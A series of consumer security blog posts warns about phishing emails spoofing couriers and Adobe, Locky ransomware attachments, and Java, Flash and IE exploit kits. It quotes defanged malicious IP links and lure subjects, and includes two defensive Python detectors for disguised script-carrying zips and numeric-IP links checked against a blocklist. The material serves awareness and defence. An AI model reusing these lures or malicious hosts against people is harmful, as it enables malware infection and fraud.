August 31, 2020

Fake DHL shipping waybill email attachment contains the Qbot spyware Trojan

Today, I received an email with the subject plainly marked as [SPAM] by SpamAssassin. The rest of the subject read as follows:

RE: DHL单号 Shipment Delivery Air Waybill no 6979374150

Note that it begins with "RE:" followed by a mention of the alleged shipping company and a waybill number. The From address falsely claimed to be "DHL Global Inc © " [email protected]. The message body started off with the following plain text...

Dear customer,

Please find the attached Air Shipping Waybill Documents mentioned above that just arrived.

Immediately after this text there was an embedded blurry image purporting to be a scan of a waybill of a shipment from China. Directly under this faked waybill was the following footer...

DHL-Sinotrans International Air Courier Ltd.

No.55 Songshan Rd, Suzhou 215129, China
Phone:+86(512)66892059-5205
Internal VoIP Phone:809-5605
Fax:+86(512)66750262
[email protected]
www.cn.dhl.com
GO GREEN - Environmental protection with DHL
Please consider your environmental responsibility before printing this email.



November 12, 2016

A flood of Ransomware in email attachments in early November 2016

Since the first week of November there has been a virtual flood of malicious email scams that have Ransomware in both .doc and .zip attachments.

The subjects vary from hour to hour and day to day. They include all of the following Subjects (with more to come):


  1. Emailing: _[digits]_[more digits]
  2. Virtual card
  3. Order
  4. "No subject"
  5. [Scan] 2016-1111 11:45:05 (time and date varies)
  6. Document from Paulette (name varies)
  7. Receipt 6940-30676 (numbers vary)
  8. unauthorized access
  9. DSCF54499.pdf (numbers vary and is really a zip file)
  10. DSCF54499.tiff (numbers vary and is really a zip file)
  11. DSCF54499.gif (numbers vary and is really a zip file)
  12. Account temporarily suspended
  13. Your Amazon.com order has dispatched (#890-6219873-3176850) (numbers vary)
  14. Your parcel has arrived
  15. Statement
  16. Suspicious movements
  17. We could not deliver your parcel, #0000331783 (numbers vary)
  18. Financial documents


The sizes of these messages vary from about 3 KB up to about 15 KB for the zip files, and over 200 KB for the Office documents, which contain a diversionary document that opens while the Trojan is downloaded in the background. The most common file sizes range from 10.5 to 12.5 KB for the zip files.

Some of these scams contain specially crafted wording to try to trick busy office workers to open the attachments. Others had nothing visible, other than the paperclip indicating that there was an attachment.

All of these attachments contain either JavaScript (.js) or Windows Script File (.wsf) scripts inside a zip file, or Office macro scripts inside a .doc or .docx file, which force a download of a Trojan horse file known as the Locky ransomware. An unprotected Windows computer can be automatically infected by opening and unzipping the zip files, or by enabling macros in MS Word or in any other .doc reader that uses the MS Word macro script language.
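As an added example (not the post's own code), here is a Python triage routine for the attachment pattern described above: it checks whether a file named .pdf, .tiff or .gif actually carries the zip signature, and lists any .js or .wsf members found inside. The sample archive, the file names and the extension sets are constructed for the demonstration.

```python
"""Attachment triage for the zipped-script lure described in the post: a file
named like a photo or PDF that is really a zip carrying a .js or .wsf dropper.
Added example; the sample archive and name lists are constructed."""
import io
import zipfile
from dataclasses import dataclass, field
from typing import List

# Script types the post says ride inside the zips and fetch the ransomware.
SCRIPT_EXTENSIONS = {".js", ".wsf"}
# Extensions the post lists as "really a zip file".
NON_ARCHIVE_EXTENSIONS = {".pdf", ".tiff", ".gif"}
# Local-file-header signature that opens every non-empty zip archive.
ZIP_MAGIC = b"PK\x03\x04"


@dataclass
class AttachmentVerdict:
    filename: str
    claimed_ext: str
    is_zip: bool                      # content starts with the zip signature
    extension_mismatch: bool          # zip content behind a non-archive name
    corrupt_archive: bool = False     # zip signature but unreadable structure
    script_members: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.extension_mismatch or self.corrupt_archive or bool(self.script_members)


def file_extension(name: str) -> str:
    """Lower-cased final extension including the dot, or '' if there is none."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def triage_attachment(filename: str, data: bytes) -> AttachmentVerdict:
    """Compare the name an attachment claims with what its bytes actually are,
    and enumerate script members if it turns out to be a zip."""
    claimed = file_extension(filename)
    is_zip = data.startswith(ZIP_MAGIC)
    verdict = AttachmentVerdict(
        filename=filename,
        claimed_ext=claimed,
        is_zip=is_zip,
        extension_mismatch=is_zip and claimed in NON_ARCHIVE_EXTENSIONS,
    )
    if not is_zip:
        return verdict
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                if file_extension(info.filename) in SCRIPT_EXTENSIONS:
                    verdict.script_members.append(info.filename)
    except zipfile.BadZipFile:
        # Signature present but no readable central directory: truncated or
        # deliberately malformed; treat as suspicious rather than ignore it.
        verdict.corrupt_archive = True
    return verdict


def build_sample_attachment() -> bytes:
    """Constructed sample: a zip whose only member is a harmless .js placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("DSCF54499.js", "// placeholder text, not a dropper\n")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_attachment()
    for name in ("DSCF54499.pdf", "DSCF54499.zip"):
        result = triage_attachment(name, sample)
        print(name, "suspicious" if result.suspicious else "ok", result.script_members)
```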

I want to point out that if you use Trend Micro Internet Security (any flavor), you are protected against these scams and Ransomware threats. I use Trend Micro and pay by the year. I feel it is well worth the money for the peace of mind.


January 22, 2015

New Flash Player zero day exploit in the wild

There is a brand new Flash Player zero day vulnerability being exploited in the wild, by the so-called "Angler" Exploit Kit. It is being used to silently install the "Bedep" click fraud Trojan. The information about this was first released on Jan 21, 2015, by a security researcher using the moniker: Kafeine.

Early information suggested that only Windows operating system users running Internet Explorer were affected. This was because the criminals who released the exploit used a single wrong line of logic. That mistake was corrected later last night and the exploit now works on the latest version of Firefox as well. Anybody browsing the Web running Internet Explorer or Firefox on the now unsupported Windows XP is totally at risk.

According to Kafeine's research, the attack worked on all versions of Flash up to the then current 16.0.0.257. I say "then current" because this morning I learned that Adobe had released an update to Flash today, January 22, with version number 16.0.0.287. Unfortunately, that new version does not close the vulnerability being exploited by the new Angler attack. It does however close a related exploit and should be applied ASAP. Flash updates are listed on the official Adobe Flash "About Flash" page, which also has a link to the official Adobe Flash Download page. I recommend that all Windows users bookmark these pages and visit them often.

What operating systems and browsers are vulnerable today?

Any version of Internet Explorer or Firefox with any version of Windows will get owned if Flash up to 16.0.0.287 (included) is installed and enabled.

What's not affected (yet)?

Google Chrome browsers are neither targeted by name nor exploited when subjected to the malicious Flash applet.

Update 1, Jan 23, 2015 (Noon EST -0500)
Two days have gone by since the initial release of the information about this zero day exploit and I just checked the Adobe Flash Player "About Flash Player" page and found no new updates. They are still sitting at version 16.0.0.287 (released on the 22nd), which is totally exploitable. All target browsers are still vulnerable.

Update 2, Jan 23, 2015 (12:05PM EST)
I just read this security bulletin on Adobe.com.

A Security Advisory (APSA15-01) has been published regarding a critical vulnerability (CVE-2015-0311) in Adobe Flash Player 16.0.0.287 and earlier versions for Windows, Macintosh and Linux. We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8 and below.

Adobe expects to have a patch available for CVE-2015-0311 during the week of January 26.

The above confirms that the zero day Angler Flash exploit attacks are also able to infect Macintosh and Linux computers with Flash installed and enabled to run automatically in the browser being used (except Chrome).

Update 3, Jan 26, 2015
Adobe has silently begun pushing out a patched version of Flash Player to fix the final 0-day vulnerability in this exploit kit campaign. The newest version is 16.0.0.296. However, the only way you will receive it is if you have set your Flash Player advanced options to automatically check for (and install) updates. Running a manual check takes you to the About Flash Player page, where, as of 12:30 pm EST, the current version was still listed as 16.0.0.287. The new patched version will be made available for manual downloading starting later today and throughout this week.

I also fixed some typos that I missed earlier.

What you can do now to protect your computers from the exploit kit.


April 18, 2013

Boston bombing email scams morph into Waco explosion scams

In the early hours of April 17, 2013, I published an article detailing an email scam using the Boston bombings as the lure to attack computers with malware. Today, that scam has switched to referring to the fertilizer plant explosion in Waco West, Texas, in the evening of April 17. The links and landing pages are the same as yesterday's.

In today's email attacks, the Subjects have been changed to refer to the Waco explosion in this fashion:

Waco Explosion HD

CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas

Raw: Texas Explosion Injures Dozens

Runner captures. Marathon Explosion

The message bodies still only contain a numeric hyperlink, in plain text. The format of these links is as follows (deactivated for your safety):

h**p://95.87.6.156/news.html

All of today's links have 4 part numeric IP addresses, followed by "/news.html" as of this writing. But, that file name has been changed to "/texas.html" in some recent messages.


April 17, 2013

Malware scammers exploiting Boston bomb tragedy by email

Tonight, I discovered a new malware attack tactic in the MailWasher Pro Recycle Bin. It was automatically deleted because it matched the conditions I created in a filter I call Exploit Link. In this case, the filter was matched by a numeric IP in the URL, instead of a domain name. Numeric URLs, especially those ending with a .htm or .html file are hostile 99.999999999% of the time. This one sure was.

The email arrived very late, at about 1 AM, Eastern time. Its sender was nobody I know, but it contained this enticing subject:

Explosion at the Boston Marathon

The total content in the message body was only a link, in this (deactivated) form:

h**p://178.137.100.12/news.html     (Don't go there!)

UPDATE: April 17, 2013, at 2:55 PM EDT:

I have now discovered some new numeric links containing the file name "/boston.html" - leading to exploit pages.

This is what is known as a numeric URL or hyperlink. It does not point to any known or registered domain name, just to an IP address. Spammers have set up a malicious web page on some compromised computer or handheld smart device that has been assigned a static IP address (usually by their broadband Internet service provider). In this case, the IP 178.137.100.12 is assigned to a "Kyivstar" GSM mobile broadband customer in Kiev, Ukraine. That IP address is already listed on my Russian Blocklist, under the CIDR 178.137.0.0/16.

UPDATE:
All of the links I have found in these email scams are leading to computers or devices located in Russia, Bulgaria, Latvia, or The Ukraine. This is an attack hosted by criminals based in the Former Soviet Union.
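An added example, not part of the original post: a Python check for the numeric-URL lure described above, matching links whose host is a bare IPv4 address and whose path ends in .htm or .html, then testing the address against a CIDR blocklist. The 178.137.0.0/16 entry is the one the post names; the 203.0.113.0/24 entry and the sample message body are constructed.

```python
"""Detect the 'numeric URL' lure from the post: a link whose host is a bare
IPv4 address rather than a domain, with a path ending in .htm or .html, and
check the address against a CIDR blocklist. Added example with a constructed
sample body; only the 178.137.0.0/16 entry comes from the post."""
import ipaddress
import re
from typing import List, NamedTuple

# http(s)://<dotted quad>[:port]/<path ending in .htm or .html>
NUMERIC_URL_RE = re.compile(
    r"https?://(?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?::\d+)?"
    r"(?P<path>/[^\s\"'<>]*\.html?)\b",
    re.IGNORECASE,
)

# The post's blocklist entry, plus a constructed entry in the RFC 5737
# documentation range so the example can show a non-listed hit as well.
BLOCKLIST = [
    ipaddress.ip_network("178.137.0.0/16"),   # named in the post
    ipaddress.ip_network("203.0.113.0/24"),   # constructed placeholder
]


class NumericLink(NamedTuple):
    url: str
    ip: str
    path: str
    blocklisted: bool


def find_numeric_links(body: str, blocklist=BLOCKLIST) -> List[NumericLink]:
    """Return every numeric .htm/.html link found in a plain-text body."""
    hits: List[NumericLink] = []
    for match in NUMERIC_URL_RE.finditer(body):
        try:
            addr = ipaddress.ip_address(match.group("ip"))
        except ValueError:
            # The loose \d{1,3} pattern also matches octets like 999; skip them.
            continue
        listed = any(addr in net for net in blocklist)
        hits.append(NumericLink(match.group(0), str(addr), match.group("path"), listed))
    return hits


def classify_body(body: str, blocklist=BLOCKLIST) -> str:
    """'exploit-link' when any numeric .htm(l) link is present (the filter the
    post describes fires on the numeric host alone); 'clean' otherwise."""
    return "exploit-link" if find_numeric_links(body, blocklist) else "clean"


# Constructed sample message: the two addresses are those quoted in the posts,
# the third line is a normal domain-based link that must not match.
SAMPLE_BODY = """Explosion at the Boston Marathon
http://178.137.100.12/news.html
http://95.87.6.156/texas.html
http://www.example.com/news.html
"""

if __name__ == "__main__":
    for hit in find_numeric_links(SAMPLE_BODY):
        print(hit.ip, hit.path, "blocklisted" if hit.blocklisted else "not listed")
    print(classify_body(SAMPLE_BODY))
```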

What awaits you at this numeric URL, ending in the file named: news.html?


January 17, 2013

Hello, another Java 0-day exploit has been revealed!

It was 5 days and a few hours ago that I published a blog article about a recent Java vulnerability being exploited in the wild. In it I advised my readers to disable Java plug-ins from running in their browsers, or to uninstall Java altogether.

Then, three days later, on Jan 14, 2013, Oracle, the keeper and maintainer of the Java code, released an out-of-band patch to plug the vulnerability that was the cause of the exploits. This was done with the release of Java 7 update 11.

However, on Wednesday, Jan 16, 2013, Trend Micro researchers posted findings that revealed that the Oracle patch was incomplete and left a related attack vector open. A few hours later, a high ranking admin on a malware distribution forum offered to sell a working exploit of this new zero day exploit for a starting bid of $5,000 USD (see Brian Krebs' article), to two more individuals (he had already sold one copy). Within a short time his offer was taken down, leading Brian Krebs to postulate that the bidding had ended and all three copies of the hardened and ready to go exploit had been sold.

I know that there are some business programs and commercial web pages that operate with Java Applets, requiring users to have Java enabled in their browsers, and/or operating systems. These people cannot just uninstall Java hodge-podge. They want a workable method of keeping Java, but reducing their exposure to malware sneak attacks. Let's see if I can help a little.


January 11, 2013

Java is most exploited browser plug-in. Disable if not needed!

Once again, Oracle's Java software is making security news for being exploited in most major exploit kits via a new zero-day vulnerability. A zero-day vulnerability is one where a proof-of-concept exploit is disclosed before the software vendor has a chance to create a patch to block that attack vector. At this time, Oracle has not released a patched version of Java and there is no known workaround. The next regularly scheduled Java update is set for February 19, 2013.

UPDATE January 14, 2013

Oracle has just released an out-of-band sudden patch for the new vulnerability in its Java Virtual Machine. The patch is called Java 7 update 11, available here.

The most dangerous and exploited type of Java is the kind that is used as a "plug-in" for web browsers (Internet Explorer, Google Chrome, Firefox, Safari, Opera, etc.). You see, when you install Java on your computer or hand-held devices, it installs both as an executable package that can be used by desktop productivity and entertainment applications, and as a plug-in for each brand of web browser you have installed on that device. The browser plug-in is responsible for running Java Applets in your browser. These Applets are supposed to be contained within a programmed-in software boundary called a "sandbox" - but they are notorious for being exploited to jump out of the sandbox and into the operating system.

I should point out that Java has been one of the favorite targets of virus and malware exploit authors since the year 1998 (Strange Brew - first Java virus). Over the years Java has been deployed in more and more devices, to the point that Oracle, the current owner, claims that Java is installed on over 3 billion devices worldwide. Chances seem reasonable that you are using one or more of those 3 billion devices.

Since Java itself can be installed and run on devices that are based on different operating systems, it can be used to download malware to any of those devices by simply detecting the operating system and downloading the appropriate binary program for exploiting it. The typical entry point for exploitation is a web browser. The method by which the browser is caused to run malicious codes can be clicking on obfuscated poisoned links in email scams, hidden "iframes" that draw the attack codes into otherwise legitimate websites (and your browser), or JavaScript redirects that were injected into the head or end sections of compromised web pages.

Java is exploited constantly, for both old and new versions and vulnerabilities, for at least three reasons: (1) It is found on 3 billion devices; (2) most people don't even know if they have Java installed on whatever devices they are using to connect to the Internet; (3) Oracle is very slow to patch Java vulnerabilities that they are notified about.

What you can do to protect your devices from Java exploits


December 25, 2012

Anatomy of an email scam spoofing FedEx and Post Office

Christmas Eve, 2012

I want to alert my readers to a spam run I saw over the last couple of days and also explain what the purpose of the scam really is. This is a new variation of a long-running scam spoofing both your Post Office and a major brand courier service, leading directly to a malware attack.

This particular variant may well become the template for ongoing spam campaigns, if the success rate is high enough. Right now, 'tis the season to receive gifts and the bait in this email scam may well trap a lot of eager folks who just may be waiting for a promised delivery of a present or online purchase.

It starts with a message claiming to be from either "Worldwide Express Mail," or "Shipping Service," or "Postal Service," with an incomprehensible "tracking" or ID number as the subject. Most have this body text, or something almost the same as this:

Your parcel has arrived at the post office at December 20.Our courier
was unable to deliver the parcel to you.

To receive a parcel, please, go to the nearest our office and show
this receipt.

DOWNLOAD POSTAL RECEIPT

Best Regards, The FedEx Team.

Here is where wisdom and suspicion are your best friends. The message text contains horrible grammar, and both a reference to a "POSTAL RECEIPT" and to "FedEx." I hope that most of you are aware that FedEx is a courier service and is NOT associated with the "Postal Service," nor do they issue "Postal Receipts." Your country's official Postal Service does that. Yet, almost every email courier scam I have seen over the last year confuses at least two, if not three services: the US Postal Service (USPS), FedEx (a private company) and UPS (United Parcel Service).

If you receive one of these failed delivery scams and you see any sign of confusion about who was supposedly delivering the package, usually accompanied by bad grammar and sentence structure, delete it immediately.

So, if this is a scam, what is the payload and what is its purpose?


December 12, 2012

Emails spoofing Adobe order numbers have links to Blackhole Exploit Kit

Today there is a new email scam run making the rounds, spoofing an Adobe order number and download link. The links are malicious, leading to the Blackhole Exploit Kit.

Details:

The email messages in question claim to come from [email protected]. But, so far, the sender's name is usually a capitalized first and sometimes also last name. This is not standard business practice and should be a dead giveaway that something is amiss. Nobody working at a major software company will spell their name in caps!

The subjects thus far have been: Order N(5 numbers)

The message body text begins with: "Good (day|morning),You can download your Adobe CS4 License here" - with a link around the word "here." If you read email on your computer you can hover your pointer over links to display the actual destination URL in a status bar that appears on the bottom of the email client. These poisoned links end with: /redirecting.htm - which is a commonly used page name for the Blackhole Exploit Kit. The landing page has the title: "Please wait" and the H1 heading: "Please wait a moment ... You will be forwarded... "

From that point onward, your browser is attacked with obfuscated JavaScript functions, probing for an exploitable version of Oracle Java or Adobe Flash, at the very least, and sometimes other vulnerable software. If you browse with Firefox with the NoScript add-on installed and active, at its default setting of disallowing Java and JavaScript unless you specifically allow them, you will not be exploited automatically. But, some attack kits also contain a manual link option that appears when people arrive with JavaScript disabled. If you are offered a manual link (on the page titled "Please wait" ... you will be forwarded) to install a "missing plug-in" (usually Java or Flash), refuse and close the page, then close the browser. Then update your security program and scan for threats that might have slipped in during the attack.

Unfortunately, many mobile phone users don't usually have this hover function that would alert them to poisoned links. You would have to be using a mobile browser or email reader that contains a hover to display function, or else pray that your device is not targeted by the exploit kit at the other end of the click.


October 11, 2012

Malware links and attachments flooding email inboxes in October

We are now one-third of the way into October and there is no letup in the volume of malware-infested email scams flooding our inboxes. When I refer to malware delivered via email, most of it is in the form of links to compromised websites that are hosting the Blackhole Exploit Kit and other similar badware.

Because of blogs like this one, many computer users are wary of clicking on links in unexpected emails. This is especially so if they have taken my advice and read the destination URL in the status bar of their email client while hovering over links without clicking. Hovering typically causes the bottom status bar to appear and display the actual URL hidden in the HTML code. This will contradict the fake anchor text, or the spoofed company's domain name, in most spam emails written to trick unwary users into clicking without thinking it through.

For example, if an email claims to be from CNN Breaking News, yet, when you hover over the links the status bar shows something like the following, it is a spoofed link, probably leading to an exploit attack kit:

h**p://strange-domain.de/FME2kA9/index.html.

"Index.html" is a favorite file name for the Blackhole purveyors. A few use the variation index32.html, while another poisoned link template uses the destination file name: "forwarding.htm."

In order to attack the more cautious email readers who don't blindly click on links, some scams pack their malicious codes into attachments that the reader is encouraged to open. One usually sees these malware laden attachments in the emails that pretend to contain a (sometimes forwarded) scan from an HP ScanJet; like this example from earlier tonight: (Subject) Re: Fwd: Scan from a HP ScanJet #14191476. That email contained an attachment named: "HP_Document.zip" that when opened would exploit some vulnerable, unpatched software you might have installed (like an outdated version of Adobe Reader, Acrobat, or Flash), launching an exploit attack on the user's computer.

A third method of exploitation is by embedding hostile scripting and invisible iframes into .htm attachments. Recipients are then urged by the spammers to open those files in Internet Explorer. Doing so launches all of the Blackhole or Phoenix exploit codes that are normally served from remote, compromised websites, or hostile malware servers.


September 17, 2012

New zero-day vulnerability in Internet Explorer being actively exploited

(Updated Sept 19, 2012, to include IE 6, plus tightening the security level of IE browsers)

The security channels are buzzing today with news about a brand new "zero-day" vulnerability in Internet Explorer browsers 6, 7, 8 and 9, which is actively being exploited to load the Poison Ivy Trojan onto victimized computers.

Details are still emerging about the exact method through which Internet Explorer is being exploited. However, one common factor is that the current exploit requires Adobe Flash to also be installed. The term "Heap Spray" is being used to describe the code injection action which leads to the downloading of a Shockwave Flash file by loading an invisible iframe into the browser. The Flash file it downloads then downloads and executes a file which installs the Poison Ivy Trojan.

NEW
A successful exploit of Windows Vista or Windows 7 also requires a vulnerable version of Java to be installed.

All of this happens behind the scenes and runs with the full privileges of the logged in user. This means that if you are lured to this trap and are operating with Administrator privileges and are browsing with Internet Explorer 6 through 9, your fully patched Windows PC may have the Poison Ivy, or some other Trojan silently installed right in front of you.

People who log in to less privileged account types will have to approve the malware installation and provide Admin credentials. While they might be tricked by crafty language, it is less likely that most of them will be fooled. FWIW, I operate as a Power User (Win XP) and Standard User in Windows 7. Both are less privileged accounts.


September 15, 2012

Exploit kit offers to install Java if you don't already have it

Many of my blog articles involve warnings about vulnerabilities in Java plug-ins for browsers. Criminals love Java because it has so many exploitable code issues that as soon as one is fixed, another is discovered. Successful exploits cause malicious code to jump out of the Java "sandbox" and into your operating system. Security bloggers like me are always advising our readers to uninstall Java for their safety and many are heeding this advice.

If you read security blogs like this one, you will often see the term "exploit kit." Usually, we discuss the most common exploit kit in use these days: "The BlackHole Exploit Kit." It is expensive, but gets incredible results because it targets the most recent vulnerabilities found in Java technology. Victims are lured to exploit kits by links in spam emails, or on compromised websites. However, if a potential victim arrives and does not have Java installed, a Java-only exploit kit fails to infect that person's computer.

As a backup plan, some exploit kits also test for the presence of Adobe Flash, or Reader, or Acrobat. If any of these are installed and are not the latest, patched version, the computer may be taken over through those plug-ins. But, if the victim's computer is fully patched and is not running Java at all, some exploit writers (Crime Boss Exploit Kit) have found a way to get one more crack at you before letting you move along. How? They tell you that Java is required to view the important details on the (exploit) page and provide a download link to you! Clicking on the download link results in an unsigned certificate alert popping up, warning that you may be downloading harmful software (Windows PCs).


August 22, 2012

Roundup of recently patched Internet security vulnerabilities

August has been a busy month for both cyber criminals and security patches from software vendors targeted by malware distributors. Microsoft released 9 security patches through its monthly Patch Tuesday, on August 14, 2012. The same day, Adobe released a new version of its Flash Player, to plug a vulnerability being exploited in the wild. Earlier today, Adobe released yet another version of Flash Player, fixing six more vulnerabilities.

These updates are all rated either "critical," or "Important" by their owners. You are strongly advised to update your Windows computers, via the links on your Start Menu for Windows or Microsoft Update, plus all installed Adobe programs, but especially Flash and AIR. Today's updates bring Flash to version 11.4.402.265 for most browsers, except for Google Chrome. Its new version is bundled into a newly released version of Chrome and holds version number 11.3.31.230. This applies to Windows and Mac computers.

To find out if you are running the current version, or an out-dated version of Flash, go to the Adobe "About Flash" page.


July 18, 2012

More BlackHole Exploit Kit attacks spoofing LinkedIn, UPS, USPS

After a week where spam for pharmaceuticals, fake diplomas and replica watches dominated inboxes and junk folders, malware scams have resumed with a vengeance. These are spam email messages that either contain malware in an attached zip file, or a link to a malware server.

The recent email malware scams I saw, over the last 7 days, are spoofing the following brands or senders with these subjects:

UPS: "UPS Tracking Number H8087145257" - "UPS Tracking Number H1284336147"
UPS and USPS together: "Your Tracking Number H6497226598"
Sprint: "Your Sprint bill is now available online"
LinkedIn: "Join My Network on LinkedIn"
US Air: "Fwd: Your Flight US 896-119520"
Bank Account Operator: "Fwd: Wire Transfer Confirmation (FED_2732L45075)"
LiveJournal.com (UPS spoof): "Your Tracking Number H6302300603"
Post Express: "Delivery status is required urgent confirmation"
LinkedIn (UPS and USPS): "United Postal Service Tracking Nr. H9486128170"
Customer Support ups: "UPS Tracking Number H7383353854"
Habbo Hotel: "UPS: Your Package H4869590295"

As you can see, scams spoofing UPS and the USPS are the most common at this time. All of the above scams either contain malware exploit codes in an attachment (e.g. "MYUPS_N230250.zip"), or at the end of a redirected link to a BlackHole Exploit Kit server. Both methods use JavaScript codes to probe your web browser or email client for vulnerabilities, or exploitable plug-ins/extensions, or basic components. The ones being targeted the most this week are: the Windows Help Center URL Validation Vulnerability, which was patched on July 13, 2010, as well as numerous vulnerabilities in the Java Virtual Machine, all of which have been patched by Oracle Java updates, plus the Microsoft XML Core Services Vulnerability just patched on July 10, 2012. Finally, some versions of the BlackHole Exploit Kit also probe for a vulnerable and exploitable version of Adobe's Reader, Acrobat and Flash software. Previous versions also sought to exploit Adobe Shockwave and AIR.

Let's analyze one of the LinkedIn malware scams I received just today.


July 2, 2012

Unpatched Microsoft XML vulnerability now in BlackHole Exploit Kit

On June 12, 2012 (Patch Tuesday), Microsoft published Security Advisory 2719615 that revealed an exploitable vulnerability in their XML Core Services, which are used by various Windows programs. Less than three weeks have passed since that Advisory and cyber-criminals have already added this vulnerability to the latest update of the BlackHole Exploit Kit.

Here is an excerpt from the Microsoft TechCenter article defining this vulnerability:

Microsoft is aware of active attacks that leverage a vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0. The vulnerability could allow remote code execution if a user views a specially crafted webpage using Internet Explorer.

The Advisory goes on to note the following details:

  1. An attacker would have to trick users into visiting the BlackHole equipped website in order to run the exploit attack.
  2. This is usually done by social engineering tactics used to trick victims into clicking on a hostile link, in an email message, or Instant Messenger, or Facebook or Twitter message, that redirects them to the attack code website.
  3. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007.
  4. The MSXML vulnerability inherits the privileges of the logged-in user. Less privileged accounts would be less likely to be infected, without further user interaction (like agreeing to a UAC challenge and allowing unknown, unexpected code to run with Administrator Privileges! DOH!)

Continue reading "Unpatched Microsoft XML vulnerability now in BlackHole Exploit Kit" »

June 14, 2012

New email BlackHole exploit attack has embedded JavaScript & iframe

A few days ago I discovered an email scam that tries to directly deliver the BlackHole Exploit Kit to victims, inside the message body of those emails. The Subject used was: "Re: URGENT" and the sender addresses spoofed Twitter, LinkedIn and sbcglobal.net customers. In all cases, the hostile code was no longer reached via links, but simply by opening the email in your email client, with HTML display enabled and iframes allowed.

Rather than delving into a big technical discussion about the exploit itself (which I have covered numerous times), this article will attempt to help protect you from being exploited by it, or another like it.

We first need to define how the attack inside these email messages is triggered. It is a two-pronged attack. The first prong is the exploit code itself, embedded inside the message body within <script> tag sets. The second is an HTML "iframe" tag whose "src" (source) is a remote server or website hosting the BlackHole attack kit.

The criminals that sent this to you are hoping to exploit you if your email reader is set to render HTML and scripting. Many users allow these things by default. The second method is used to attack you in the event you disallow scripting, but do allow iframe contents to be rendered. This is a tricky one-two punch.

Here are some ways you can protect your computers from being exploited by the embedded BlackHole attacks.

Continue reading "New email BlackHole exploit attack has embedded JavaScript & iframe" »

June 4, 2012

Flame Worm uses fake signed Microsoft digital certificates to install

Earlier today I published a blog article detailing why Microsoft has issued an out-of-band patch that plugs a vulnerability used by the Flame malware, as one means of installing itself. Now, I have learned how the malware is exploiting these certificates and what the patch does to stop this method of exploitation.

According to recent analysis of the Flame malware, by Kaspersky Labs, one of the methods used by the Flame to propagate inside a network is to present a forged signed-by-Microsoft digital certificate when trying to install itself on an uninfected PC. The certificate is used to install a fake Windows Update component deceptively named "Desktop Gadget Platform" - which lies to you by claiming it: "Allows you to display gadgets on your desktop."

Because it uses a previously acceptable certificate of authenticity, claiming to have been signed by Microsoft itself, the operating system would allow the installation to take place without a second thought, or any user interaction. But, not any more! Today's critical patch KB2718704 has revoked the digital certificates used by the Flame Worm. Now, if this malware attempts to install, a challenge box will pop up. It will list the installer as Unsigned or Untrusted, rather than Signed. If you check for a certificate, it will reveal that the certificate used has been revoked by the issuer.

Thus, the out-of-cycle patch that Microsoft released earlier today will block unattended infections that were previously allowed by the fraudulently signed (by Microsoft) certificates. These revocations will stop this attack vector, but not others. It is still unknown how the Flame malware is introduced into a system, to infect the first host. Researchers are currently looking for an unknown zero day exploit. Keep in mind that the forged signed certificates were a form of zero day attack. It took a long time for this vector to be discovered, but only hours to revoke their permissions and plug that hole.

Footnote: The digital certificates used to spread the Flame malware were signed in 2010. This subterfuge was only discovered in the last few days, a full two years after the fact. It is still not known how these fake certs were signed. That will eventually come to light, along with other facts about this new Flame malware burning up the security news channels as The Hot Topic (puns intended)!

My previous article urges all Windows computer owners and Admins to use Windows Update to install Patch KB2718704 as soon as possible. I repeat the call for urgency in patching against this new malware and others like it that are bound to follow. The next Flame might not be an espionage tool but a new form of botnet and attack weapon.

If you operate with less than Administrator privileges, the patch may be pushed to you when you shut down, or log off. If you run Microsoft Security Essentials, it runs with System privileges and may install the patch with no user interaction or restarts at all. It did just that on my XP Pro machine!

Out of band Microsoft patch quenches Flame malware exploit vector

The Flame malware has been a hot topic for the last week, after it was discovered infecting industrial computer systems in the Middle East and Iran. This malware is very high level and is designed for spying on carefully selected industrial and Government systems. It has attracted a lot of attention in the short time it has been known to security companies, and today it got Microsoft's attention.

Today, June 4, 2012, Microsoft has issued an out-of-band patch for one of the vulnerabilities used by the Flame to infect Windows computers. Patch KB2718704 is now being pushed to all supported versions of Windows, via Windows Updates. I just applied it to my Windows 7 PC and it did not require a restart.

What vulnerability does patch 2718704 fix?

According to the aforementioned Microsoft Advisory, one of the infection vectors used by the Flame malware is exploiting an old feature belonging to Windows Terminal Services and used in Remote Desktop connections. Specifically, this is labeled: "Unauthorized Digital Certificates Could Allow Spoofing" - and is defined as follows:

"Microsoft is aware of active attacks using unauthorized digital certificates derived from a Microsoft Certificate Authority. An unauthorized certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks. This issue affects all supported releases of Microsoft Windows."

The advisory reveals that at least three unauthorized signed certificates are being used in the Flame attacks. Additionally, this patch addresses unauthorized digital certificates described in previous advisories: Microsoft Security Advisory 2524375, Microsoft Security Advisory 2607712, and Microsoft Security Advisory 2641690.

What does this patch do?


We (Microsoft) have updated the Untrusted Certificate Store to remove the trust in the affected Microsoft certification authorities.

Today's advisory goes on to urge all people running any supported version of Windows, including XP (w/SP 3), Vista, 7, Server 2003 and Server 2008, to run Windows Updates immediately, to install Patch KB2718704.

If the Flame is an industrial espionage Trojan, why should we all have to patch against it?

We have previous experience with another similar computer Worm, discovered in June 2010, which was also designed for industrial espionage. That Worm was meant to only infect nuclear facilities in Iran, but accidentally broke loose and infected an untold number of business and personal computers around the world, none of which were its intended targets. That malware is known as the Stuxnet Worm and it is still infecting computer systems two years after being discovered.

So, while you and I are probably not an intended target of the Flame malware, now that it is loose, it is prudent that we apply the patch that blocks one of its most common methods of propagating. Go to Windows Updates on all of your Windows computers, check for patch KB2718704 and install it.

May 24, 2012

Anatomy of a PayPal email scam leading to malware

Cyber-criminals are once again ramping up their email scam campaigns to deliver messages with links to malware servers they control. One of the recent scams, happening this week, is a PayPal Payment scam, with links leading to an exploit attack kit.

